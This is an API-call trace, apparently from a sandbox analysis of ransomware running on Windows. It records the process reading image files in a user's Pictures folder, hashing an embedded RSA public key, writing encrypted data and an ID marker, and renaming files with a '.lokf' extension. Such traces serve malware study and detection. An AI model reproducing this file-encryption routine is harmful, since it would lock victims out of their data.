RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b478 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.141] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.141] GetCurrentThreadId () returned 0x9e0 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7dda8 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.141] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.142] GetCurrentThreadId () returned 0x9e0 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b478 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b490 [0059.142] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.142] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b460 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b4a8 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b478 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b478 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.143] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b478 | out: hHeap=0x660000) returned 1 [0059.143] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.144] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b4a8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b460 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b448 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c832f8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.144] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0059.145] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0xfbf9, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0xfbf9, lpOverlapped=0x0) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0059.145] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfbfe, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.145] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0059.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0059.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0059.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.145] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0059.145] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0059.146] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.146] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.146] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.146] CloseHandle (hObject=0x5cc) returned 1 [0059.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0059.147] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x880) returned 0x3268798 [0059.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0059.147] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\H4Ti7A LHpB.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\h4ti7a lhpb.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\H4Ti7A LHpB.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\h4ti7a lhpb.png.lokf")) returned 1 [0059.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.147] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.147] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0059.148] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd1bc51f0, ftCreationTime.dwHighDateTime=0x1d4cf20, ftLastAccessTime.dwLowDateTime=0x716b01e0, ftLastAccessTime.dwHighDateTime=0x1d4d4be, ftLastWriteTime.dwLowDateTime=0x716b01e0, ftLastWriteTime.dwHighDateTime=0x1d4d4be, nFileSizeHigh=0x0, nFileSizeLow=0xf484, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsPblQOgWlR.jpg", cAlternateFileName="HSPBLQ~1.JPG")) returned 1 [0059.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0059.148] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0059.148] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0059.148] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hsPblQOgWlR.jpg") returned=".jpg" [0059.148] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\hsPblQOgWlR.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\hspblqogwlr.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.148] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=62596) returned 1 [0059.149] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.151] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xf45e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.151] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.152] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.152] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.152] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xf484, lpOverlapped=0x0) returned 1 [0059.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.152] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.152] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.152] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.153] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.153] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.153] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.153] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.153] GetLastError () returned 0x0 [0059.153] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.153] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.153] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.153] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.153] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.153] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.153] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xf480) returned 0x9c83710 [0059.154] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c832f8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b448 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c83340 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b460 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b490 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b4a8 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.154] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.154] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.154] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b490 | out: hHeap=0x660000) returned 1 [0059.154] HeapFree (in: 